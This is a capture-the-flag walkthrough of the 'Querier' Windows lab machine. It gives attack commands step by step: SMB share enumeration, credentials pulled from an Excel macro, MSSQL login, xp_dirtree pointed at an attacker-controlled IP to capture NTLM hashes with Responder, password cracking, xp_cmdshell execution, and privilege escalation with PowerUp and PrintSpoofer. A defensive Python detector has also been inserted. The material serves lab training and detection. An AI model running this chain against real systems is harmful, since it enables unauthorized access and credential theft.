Querier

Published: Apr 15, 2025

Enumeration

Scan

Starting off with a basic nmap scan:

nmap -sC -sV -oN nmap/init.nmap 10.10.10.125

SMB

Since SMB is open, let's use smbmap to enumerate accessible shares:

smbmap -u anonymous -H 10.10.10.125

Taking a look at the non-default share "Reports", we find a file called "Currency Volume Report.xlsm". The .xlsm extension signifies a macro-enabled Excel document, so let's take a look at the macros in the file. Plaintext credentials! reporting:PcwTWTHRwryjc$c6

Foothold

MSSQL

With our new credentials, let's try connecting to the MSSQL server we learned about from our initial scan.
Using impacket-mssqlclient, we can log in to the SQL Server database:

impacket-mssqlclient -windows-auth reporting:'PcwTWTHRwryjc$c6'@10.10.10.125

After some looking around, there seems to be no interesting data in the database...

Responder

One interesting thing is that xp_dirtree is capable of listing files on the Windows host, including over UNC paths. We can attempt to abuse this by pointing it at a remote share that we control and capturing the NTLMv2 hash of the service account.
Setting up Responder:

sudo responder -I tun0

In the MSSQL client (the UNC path is a T-SQL string literal, so it needs quotes):

xp_dirtree '\\10.10.14.7\doesnotexist'

Password Cracking

After putting the hash into a file (e.g. "mssql.hash"), we can crack it using the tool john with the wordlist rockyou.txt:

john mssql.hash --wordlist=/usr/share/wordlists/rockyou.txt

We have successfully recovered valid credentials for the service account! mssql-svc:corporate568

Command Execution

We can use these credentials to log in to the database again, but now we can run xp_cmdshell and get a reverse shell of choice.
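From the defender's side, both steps above (xp_dirtree reaching out to an attacker-controlled share, then xp_cmdshell being enabled and run) leave a trace in SQL Server statement auditing. The following is an added example, not part of the original write-up, that runs a simple detection over a constructed audit log; the log line layout, the internal CIDR list and the ".corp.local" suffix are assumptions.

```python
import ipaddress
import re

# Constructed sample audit lines (not from the original write-up). The
# "timestamp login=<user> stmt=<T-SQL>" layout is assumed, not SQL Server's own.
SAMPLE_LOG = """\
2025-04-15T10:01:02Z login=reporting stmt=SELECT name FROM sys.databases
2025-04-15T10:02:11Z login=reporting stmt=EXEC xp_dirtree '\\\\10.10.14.7\\doesnotexist'
2025-04-15T10:02:30Z login=reporting stmt=EXEC xp_dirtree '\\\\fileserver.corp.local\\reports'
2025-04-15T10:05:44Z login=mssql-svc stmt=EXEC sp_configure 'xp_cmdshell', 1
2025-04-15T10:05:50Z login=mssql-svc stmt=EXEC xp_cmdshell 'whoami'
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) login=(?P<login>\S+) stmt=(?P<stmt>.*)$")
# Procedures that make the SQL Server service account authenticate to a UNC path.
UNC_PROCS = ("xp_dirtree", "xp_fileexist", "xp_subdirs")
UNC_RE = re.compile(r"\\\\(?P<host>[^\\\s'\"]+)")  # matches \\host\share...


def is_internal(host, internal_nets):
    """True if the UNC host is an internal IP or carries the assumed internal DNS suffix."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower().endswith(".corp.local")  # assumed internal suffix
    return any(ip in net for net in internal_nets)


def find_mssql_abuse(log_text, internal_cidrs):
    """Return findings for UNC coercion to external hosts and xp_cmdshell use."""
    nets = [ipaddress.ip_network(c) for c in internal_cidrs]
    findings = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        stmt, low = m["stmt"], m["stmt"].lower()
        base = {"ts": m["ts"], "login": m["login"]}
        if any(p in low for p in UNC_PROCS):
            u = UNC_RE.search(stmt)
            if u and not is_internal(u["host"], nets):
                findings.append({**base, "rule": "unc-to-external-host", "host": u["host"]})
        if "xp_cmdshell" in low:
            rule = "xp_cmdshell-enabled" if "sp_configure" in low else "xp_cmdshell-executed"
            findings.append({**base, "rule": rule, "host": None})
    return findings
```

Run against the sample above with internal_cidrs=["10.10.10.0/24"], the coercion to 10.10.14.7 is flagged while the lookup on the internal file server is not, and both xp_cmdshell events are reported.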

Privilege Escalation

Power Up

To look for some quick Privilege Escalation opportunities, let's run PowerUp.ps1:

. .\PowerUp.ps1
Invoke-AllChecks

The script found credentials in a cached "Group Policy Preference" (GPP) file and automatically decrypted the password for us! Administrator:MyUnclesAreMarioAndLuigi!!1!

Alternate: Privilege Abuse

The script also pointed out that our user has the SeImpersonatePrivilege. This is common for a service account, and it is also a common Privilege Escalation vector. There are many exploits that work here, PrintSpoofer.exe being one of them.

.\PrintSpoofer.exe -c "command"

After getting an administrative shell, here's a fun way to grab both flags:

gci -Recurse -ErrorAction SilentlyContinue -Path C:\Users -Force | ?{$_.Name -eq "user.txt" -or $_.Name -eq "root.txt"} | %{Write-Host "$($_.Name):";gc $_.FullName}